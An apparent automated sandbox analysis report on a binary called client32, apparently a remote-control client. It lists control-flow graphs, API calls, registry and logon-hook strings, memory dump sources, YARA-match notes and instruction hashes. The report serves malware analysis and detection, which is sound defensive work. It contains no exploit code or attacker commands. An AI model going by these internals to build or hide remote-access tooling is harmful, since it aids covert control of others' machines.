                                                        control_flow_graph 2755 11027150-1102716d 2756 11027173-110271a2 2755->2756 2757 11027838-1102783f 2755->2757 2758 11027230-11027278 GetModuleFileNameA call 11151c70 call 111524d7 2756->2758 2759 110271a8-110271ae 2756->2759 2760 11027851-11027855 2757->2760 2761 11027841-1102784a 2757->2761 2775 1102727d 2758->2775 2763 110271b0-110271b8 2759->2763 2765 11027857-11027869 call 11150781 2760->2765 2766 1102786a-1102787e call 11150781 2760->2766 2761->2760 2764 1102784c 2761->2764 2763->2763 2770 110271ba-110271c0 2763->2770 2764->2760 2774 110271c3-110271c8 2770->2774 2774->2774 2776 110271ca-110271d4 2774->2776 2777 11027280-1102728a 2775->2777 2778 110271f1-110271f7 2776->2778 2779 110271d6-110271dd 2776->2779 2781 11027290-11027293 2777->2781 2782 1102782f-11027837 2777->2782 2780 110271f8-110271fe 2778->2780 2783 110271e0-110271e6 2779->2783 2780->2780 2785 11027200-1102722e call 111524d7 2780->2785 2781->2782 2786 11027299-110272a7 call 110255f0 2781->2786 2782->2757 2783->2783 2784 110271e8-110271ee 2783->2784 2784->2778 2785->2777 2791 110277b5-110277ca call 111522a1 2786->2791 2792 110272ad-110272c0 call 11151867 2786->2792 2791->2782 2799 110277d0-1102782a 2791->2799 2797 110272c2-110272c5 2792->2797 2798 110272cb-110272f3 call 11025460 call 110255f0 2792->2798 2797->2791 2797->2798 2798->2791 2804 110272f9-11027316 call 110256e0 call 110255f0 2798->2804 2799->2782 2809 11027725-1102772c 2804->2809 2810 1102731c 2804->2810 2811 11027752-11027759 2809->2811 2812 1102772e-11027731 2809->2812 2813 11027320-11027340 call 11025460 2810->2813 2816 11027771-11027778 2811->2816 2817 1102775b-11027761 2811->2817 2812->2811 2815 11027733-1102773a 2812->2815 2823 11027342-11027345 2813->2823 2824 11027376-11027379 2813->2824 2821 11027740-11027750 2815->2821 2819 1102777a-11027785 2816->2819 2820 11027788-1102778f 2816->2820 2822 11027767-1102776f 2817->2822 2819->2820 2825 11027791-1102779b 2820->2825 2826 1102779e-110277a5 2820->2826 2821->2811 2821->2821 2822->2816 2822->2822 2827 11027347-1102734e 2823->2827 2828 1102735e-11027361 2823->2828 2830 1102770e-1102771f call 110255f0 2824->2830 2831 1102737f-11027392 call 11152630 2824->2831 2825->2826 2826->2791 2829 110277a7-110277b2 2826->2829 2832 11027354-1102735c 2827->2832 2828->2830 2833 11027367-11027371 2828->2833 2829->2791 2830->2809 2830->2813 2831->2830 2838 11027398-110273b4 call 11152f3c 2831->2838 2832->2828 2832->2832 2833->2830 2841 110273b6-110273bc 2838->2841 2842 110273cf-110273e5 call 11152f3c 2838->2842 2844 110273c0-110273c8 2841->2844 2847 110273e7-110273ed 2842->2847 2848 110273ff-11027415 call 11152f3c 2842->2848 2844->2844 2845 110273ca 2844->2845 2845->2830 2849 110273f0-110273f8 2847->2849 2853 11027417-1102741d 2848->2853 2854 1102742f-11027445 call 11152f3c 2848->2854 2849->2849 2851 110273fa 2849->2851 2851->2830 2855 11027420-11027428 2853->2855 2859 11027447-1102744d 2854->2859 2860 1102745f-11027475 call 11152f3c 2854->2860 2855->2855 2857 1102742a 2855->2857 2857->2830 2861 11027450-11027458 2859->2861 2865 11027477-1102747d 2860->2865 2866 1102748f-110274a5 call 11152f3c 2860->2866 2861->2861 2863 1102745a 2861->2863 2863->2830 2867 11027480-11027488 2865->2867 2871 110274a7-110274ad 2866->2871 2872 110274bf-110274d5 call 11152f3c 2866->2872 2867->2867 2869 1102748a 2867->2869 2869->2830 2874 110274b0-110274b8 2871->2874 2877 110274d7-110274dd 2872->2877 2878 110274ef-11027505 call 11152f3c 2872->2878 2874->2874 2876 110274ba 2874->2876 2876->2830 2879 110274e0-110274e8 2877->2879 2883 11027507-1102750d 2878->2883 2884 1102751f-11027535 call 11152f3c 2878->2884 2879->2879 2881 110274ea 2879->2881 2881->2830 2885 11027510-11027518 2883->2885 2889 11027537-1102753d 2884->2889 2890 1102754f-11027565 call 11152f3c 2884->2890 2885->2885 2887 1102751a 2885->2887 2887->2830 2892 11027540-11027548 2889->2892 2895 11027567-1102756d 2890->2895 2896 1102757f-11027595 call 11152f3c 2890->2896 2892->2892 2893 1102754a 2892->2893 2893->2830 2897 11027570-11027578 2895->2897 2901 11027597-1102759d 2896->2901 2902 110275af-110275c5 call 11152f3c 2896->2902 2897->2897 2899 1102757a 2897->2899 2899->2830 2903 110275a0-110275a8 2901->2903 2907 110275e6-110275fc call 11152f3c 2902->2907 2908 110275c7-110275cd 2902->2908 2903->2903 2905 110275aa 2903->2905 2905->2830 2913 11027613-11027629 call 11152f3c 2907->2913 2914 110275fe 2907->2914 2909 110275d7-110275df 2908->2909 2909->2909 2911 110275e1 2909->2911 2911->2830 2919 11027640-11027656 call 11152f3c 2913->2919 2920 1102762b 2913->2920 2915 11027604-1102760c 2914->2915 2915->2915 2917 1102760e 2915->2917 2917->2830 2925 11027677-1102768d call 11152f3c 2919->2925 2926 11027658-1102765e 2919->2926 2922 11027631-11027639 2920->2922 2922->2922 2924 1102763b 2922->2924 2924->2830 2931 110276af-110276c5 call 11152f3c 2925->2931 2932 1102768f-1102769f 2925->2932 2927 11027668-11027670 2926->2927 2927->2927 2929 11027672 2927->2929 2929->2830 2937 110276c7-110276cd 2931->2937 2938 110276dc-110276f2 call 11152f3c 2931->2938 2933 110276a0-110276a8 2932->2933 2933->2933 2935 110276aa 2933->2935 2935->2830 2940 110276d0-110276d8 2937->2940 2938->2830 2943 110276f4-110276fa 2938->2943 2940->2940 2941 110276da 2940->2941 2941->2830 2944 11027704-1102770c 2943->2944 2944->2830 2944->2944
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6CB31370,?,0000001A), ref: 1102723D
                                                        • _strrchr.LIBCMT ref: 1102724C
                                                          • Part of subcall function 11152F3C: __stricmp_l.LIBCMT ref: 11152F79
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                        • API String ID: 1609618855-357498123
                                                        • Opcode ID: 138740f618a786b5ee3efac041f3e8d7d14c2bebde02be3fe677fdfd87e3208f
                                                        • Instruction ID: f6baba5e36d17a1f61544e27a43f00c9efa3f214cb3d29d370909431fefea075
                                                        • Opcode Fuzzy Hash: 138740f618a786b5ee3efac041f3e8d7d14c2bebde02be3fe677fdfd87e3208f
                                                        • Instruction Fuzzy Hash: 9B12E639C046A78FDB56CF24C890BD8BBA0AB3634CF5440E9DCD597241EB71958ACF92
                                                        Function 1102ED27 Relevance: 40.7, APIs: 13, Strings: 10, Instructions: 441registrylibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2945 1102ed27-1102ed3c 2947 1102ed42-1102ed4b 2945->2947 2948 1102f4e8-1102f515 call 110e2730 call 11150781 2945->2948 2950 1102ed51-1102ed58 2947->2950 2951 1102ee19-1102ee2c 2947->2951 2950->2951 2953 1102ed5e-1102ed80 RegOpenKeyExA 2950->2953 2958 1102ee32-1102ee35 2951->2958 2959 1102ef07-1102ef11 2951->2959 2956 1102ee13 2953->2956 2957 1102ed86-1102edb3 call 11132450 2953->2957 2956->2951 2974 1102ee06-1102ee0d RegCloseKey 2957->2974 2975 1102edb5-1102edd2 call 11151867 call 11152c8a 2957->2975 2964 1102ee37-1102ee4c 2958->2964 2965 1102ee7a 2958->2965 2960 1102ee52-1102ee70 call 11102870 call 110fc270 2959->2960 2961 1102ef17-1102ef2d call 11102870 2959->2961 2990 1102ee75-1102f073 2960->2990 2977 1102ef33-1102ef3a call 110eeb50 2961->2977 2978 1102f06d-1102f06f 2961->2978 2964->2960 2968 1102ee84-1102ee87 2965->2968 2969 1102ee7c-1102ee82 2965->2969 2968->2959 2973 1102ee89-1102eea4 GetModuleHandleA GetProcAddress 2968->2973 2969->2960 2979 1102eea6-1102eeb1 GetNativeSystemInfo 2973->2979 2980 1102eebf-1102eed2 2973->2980 2974->2956 3008 1102ede6-1102ede9 2975->3008 3009 1102edd4-1102ede4 call 11152c8a 2975->3009 2988 1102f078-1102f0bc GetStockObject GetObjectA 2977->2988 2978->2988 2979->2980 2984 1102eeb3-1102eeb8 2979->2984 2986 1102eed8 2980->2986 2987 1102efcf-1102efd2 2980->2987 2984->2980 2994 1102efa2-1102efa9 2986->2994 2995 1102eede-1102eee6 2986->2995 2991 1102efd4-1102efdd 2987->2991 2992 1102eff8 2987->2992 2999 1102f0c8-1102f22f SetErrorMode * 2 call 11102870 call 11026ed0 call 11102870 call 11026ed0 InterlockedExchange call 11102870 call 11084cb0 GetACP call 11151b53 call 11153e83 call 11131ff0 call 11132000 call 11102870 call 1105c840 2988->2999 3000 1102f0be 2988->3000 2990->2988 3002 1102efee-1102eff1 2991->3002 3003 1102efdf-1102efe9 2991->3003 2992->2960 3004 1102effe-1102f005 2992->3004 2997 1102efc0-1102efca 2994->2997 2998 1102efab-1102efbb 2994->2998 3006 1102eee8-1102eeef 2995->3006 3007 1102ef3f-1102ef42 2995->3007 2997->2960 3010 1102ef01 2998->3010 3062 1102f231 2999->3062 3063 1102f237-1102f23d 2999->3063 3000->2999 3002->3004 3012 1102eff3 3002->3012 3003->2960 3015 1102f007-1102f011 3004->3015 3016 1102f01c-1102f026 3004->3016 3017 1102eef1-1102eefb 3006->3017 3018 1102ef5e-1102ef6e 3006->3018 3013 1102ef70-1102ef73 3007->3013 3014 1102ef44-1102ef4a 3007->3014 3021 1102edeb 3008->3021 3022 1102edec-1102edf8 call 11151867 3008->3022 3009->3008 3010->2959 3012->2960 3013->2994 3024 1102ef75-1102ef7c 3013->3024 3014->3018 3023 1102ef4c-1102ef5c 3014->3023 3015->3016 3016->2978 3017->3010 3018->3010 3021->3022 3022->2974 3033 1102edfa-1102ee00 3022->3033 3023->3010 3028 1102ef93-1102ef9d 3024->3028 3029 1102ef7e-1102ef8e 3024->3029 3028->2960 3029->3010 3033->2974 3062->3063 3064 1102f279-1102f2e1 call 11102870 call 11116a20 call 111076a0 3063->3064 3065 1102f23f-1102f255 call 11102870 3063->3065 3083 1102f2e7-1102f2fd call 11102870 3064->3083 3084 1102f36e-1102f370 3064->3084 3071 1102f257-1102f26c call 1105c4b0 3065->3071 3072 1102f26e 3065->3072 3075 1102f270-1102f274 3071->3075 3072->3075 3075->3064 3093 1102f308 3083->3093 3094 1102f2ff-1102f306 call 11083130 3083->3094 3085 1102f382-1102f389 call 1100d4e0 3084->3085 3086 1102f372-1102f37f call 11116b10 call 11150341 3084->3086 3085->2948 3097 1102f38f-1102f3a3 call 1100d200 call 111356e0 3085->3097 3086->3085 3095 1102f30a-1102f32c call 11102870 3093->3095 3094->3095 3105 1102f343 3095->3105 3106 1102f32e-1102f341 call 11057e00 3095->3106 3097->2948 3109 1102f345-1102f36c call 11102960 call 110581f0 call 11025f10 3105->3109 3106->3109 3109->3085
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,00000001,?), ref: 1102ED78
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        • RegCloseKey.KERNEL32(?), ref: 1102EE0D
                                                          • Part of subcall function 11152C8A: __isdigit_l.LIBCMT ref: 11152CAF
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1102EE95
                                                        • GetProcAddress.KERNEL32(00000000), ref: 1102EE9C
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 1102EEAA
                                                        • GetStockObject.GDI32(0000000D), ref: 1102F083
                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 1102F093
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F0D1
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F0D7
                                                        • InterlockedExchange.KERNEL32(02D08D18,00001388), ref: 1102F158
                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 1102F18A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorModeObject$AddressCloseExchangeHandleInfoInterlockedModuleNativeOpenProcQueryStockSystemValue__isdigit_l
                                                        • String ID: .%d$3$CurrentVersion$Error %s unloading audiocap dll$GetNativeSystemInfo$SOFTWARE\Microsoft\Windows NT\CurrentVersion$kernel32.dll$pcicl32$u:j$*6$M7
                                                        • API String ID: 3742979543-1875362328
                                                        • Opcode ID: b30e950a16208c9b80ba5814f786be33e61252569c30e4c8fcf91a30b9764def
                                                        • Instruction ID: 9d50fd4c4b4771c4e818bae6168a3bc14b0d19ca60a63814d56272cf95f99725
                                                        • Opcode Fuzzy Hash: b30e950a16208c9b80ba5814f786be33e61252569c30e4c8fcf91a30b9764def
                                                        • Instruction Fuzzy Hash: 8CF156B5D01265DEEF91CB60CC88BDDFAF4AB0530CF5441AEEC09A7281EA755E84CB52
                                                        Function 6C8151C0 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 286sleepsynchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3118 6c8151c0-6c815234 call 6c822440 call 6c804950 GetTickCount call 6c8177d0 3125 6c815612-6c815622 call 6c820641 3118->3125 3126 6c81523a-6c81523c 3118->3126 3128 6c815240-6c81524d GetTickCount 3126->3128 3129 6c81525c-6c815263 3128->3129 3130 6c81524f-6c815257 call 6c814f90 3128->3130 3133 6c815265 call 6c8080c0 3129->3133 3134 6c81526a-6c815271 3129->3134 3130->3129 3133->3134 3136 6c815280-6c815287 3134->3136 3137 6c815273-6c81527b Sleep 3134->3137 3139 6c815289-6c815296 WaitForSingleObject 3136->3139 3140 6c81529c-6c8152dc call 6c821980 select 3136->3140 3138 6c8155f0-6c8155f7 3137->3138 3138->3128 3141 6c8155fd-6c81560f call 6c820641 3138->3141 3139->3140 3140->3141 3146 6c8152e2-6c8152e5 3140->3146 3147 6c8152e7-6c8152f9 Sleep 3146->3147 3148 6c8152fe-6c815300 3146->3148 3147->3138 3148->3128 3149 6c815306-6c81530e GetTickCount 3148->3149 3150 6c815316-6c815335 3149->3150 3151 6c815340-6c81534c 3150->3151 3152 6c8153a3-6c8153ac 3151->3152 3153 6c81534e-6c815353 3151->3153 3156 6c8153b2-6c8153fc _calloc call 6c804750 3152->3156 3157 6c8155dd-6c8155e4 3152->3157 3154 6c815393-6c815394 3153->3154 3155 6c815355-6c815361 3153->3155 3154->3152 3158 6c815363-6c81536f 3155->3158 3159 6c815396-6c815399 3155->3159 3166 6c815402 3156->3166 3167 6c8155a8-6c8155d5 GetTickCount InterlockedExchange call 6c815da0 3156->3167 3160 6c815310 3157->3160 3161 6c8155ea 3157->3161 3164 6c815371-6c81537d 3158->3164 3165 6c81539b-6c81539e 3158->3165 3159->3152 3160->3150 3161->3138 3168 6c8153a0 3164->3168 3169 6c81537f-6c81538c 3164->3169 3165->3152 3170 6c81541c-6c81545d call 6c807c00 3166->3170 3167->3161 3176 6c8155d7 3167->3176 3168->3152 3169->3151 3172 6c81538e 3169->3172 3177 6c815463-6c8154c5 GetTickCount InterlockedExchange _calloc call 6c821980 3170->3177 3178 6c81559d-6c81559f 3170->3178 3172->3157 3176->3157 3184 6c8154c7-6c8154c8 3177->3184 3185 6c8154f8-6c815506 call 6c8110c0 3177->3185 3180 6c8155a0-6c8155a5 call 6c808c00 3178->3180 3180->3167 3187 6c8154e3-6c8154f6 call 6c807de0 3184->3187 3188 6c8154ca-6c8154e1 call 6c805910 3184->3188 3189 6c81550b-6c815511 3185->3189 3187->3189 3192 6c815514-6c81552a call 6c815da0 3188->3192 3189->3192 3197 6c815592-6c81559b 3192->3197 3198 6c81552c-6c81558a InterlockedDecrement SetEvent call 6c820f10 call 6c804750 3192->3198 3197->3180 3203 6c815410-6c815416 3198->3203 3204 6c815590 3198->3204 3203->3170 3204->3167
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 6C8151F5
                                                        • GetTickCount.KERNEL32 ref: 6C815240
                                                        • Sleep.KERNEL32(00000064), ref: 6C815275
                                                          • Part of subcall function 6C814F90: GetTickCount.KERNEL32 ref: 6C814FA1
                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6C815296
                                                        • _memmove.LIBCMT ref: 6C8152AD
                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C8152CE
                                                        • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C8152F3
                                                        • GetTickCount.KERNEL32 ref: 6C815306
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CountTick$Sleep$ObjectSingleWait_memmoveselect
                                                        • String ID: FALSE$ResumeTimeout$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$httprecv
                                                        • API String ID: 1069524698-4272157152
                                                        • Opcode ID: 44b8122b64c93034257dea3116607ca444f509b54f367f259ba94d10449c9234
                                                        • Instruction ID: 593d368d61dbfeb8c718b8080e9c3fdd6777ce14be9c65a4a7ba02494ad80cd7
                                                        • Opcode Fuzzy Hash: 44b8122b64c93034257dea3116607ca444f509b54f367f259ba94d10449c9234
                                                        • Instruction Fuzzy Hash: EAB1A3B1D042599FDB30DF68CE84BDA73B5AB05308F4049B9E549ABA40D7B4AAC4CFD1
                                                        Function 11130D40 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11130DFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 3535843008-1157355927
                                                        • Opcode ID: 519f82d833db5c70aa90aaa52ac6864dd0292cdb3728e72bd5b4ca3116148888
                                                        • Instruction ID: 92f743161b8d2e512d760a62df3d5c411700057ac8f76655c4977d74fc17002b
                                                        • Opcode Fuzzy Hash: 519f82d833db5c70aa90aaa52ac6864dd0292cdb3728e72bd5b4ca3116148888
                                                        • Instruction Fuzzy Hash: A0420574E102959BEB21CB60CD40FDEFBB5AFC5319F0441D8D90967285EA726E84CF61
                                                        Function 110FC270 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 234libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas), ref: 110FC34A
                                                        • CloseHandle.KERNEL32(00000000), ref: 110FC359
                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 110FC36B
                                                        • LoadLibraryA.KERNEL32(?), ref: 110FC3A1
                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 110FC3CE
                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 110FC3E6
                                                        • FreeLibrary.KERNEL32(?), ref: 110FC40B
                                                          • Part of subcall function 11102700: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7774C3F0,00000000,?,11103735,111032D0,00000001,00000000), ref: 11102717
                                                          • Part of subcall function 11102700: CreateThread.KERNEL32(00000000,11103735,00000001,00000000,00000000,0000000C), ref: 1110273A
                                                          • Part of subcall function 11102700: WaitForSingleObject.KERNEL32(?,000000FF,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102767
                                                          • Part of subcall function 11102700: CloseHandle.KERNEL32(?,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102771
                                                        • GetStockObject.GDI32(0000000D), ref: 110FC41F
                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 110FC42F
                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 110FC44B
                                                        • InitializeCriticalSection.KERNEL32(111DBDA4), ref: 110FC456
                                                          • Part of subcall function 110FA7D0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11177D16,000000FF), ref: 110FA8A3
                                                          • Part of subcall function 110FA7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FA8EC
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC499
                                                          • Part of subcall function 11096D20: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D41
                                                          • Part of subcall function 11096D20: OpenProcessToken.ADVAPI32(00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D48
                                                          • Part of subcall function 11096D20: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11096D67
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC4EA
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC543
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC587
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                        • API String ID: 3930710499-403456261
                                                        • Opcode ID: b4f7a2aa001f08eb1de94084590e4a4e84de2b21180eea1441a02a77e5a43ed9
                                                        • Instruction ID: 96122f269ef65589949905bb9c4ffe43a99982700637f7301abdf7ec8998ec3b
                                                        • Opcode Fuzzy Hash: b4f7a2aa001f08eb1de94084590e4a4e84de2b21180eea1441a02a77e5a43ed9
                                                        • Instruction Fuzzy Hash: 859191B5E01756AFDB11CFB48D8AB9EBBE4BB05308F044579E55AD7280E770AA40CB11
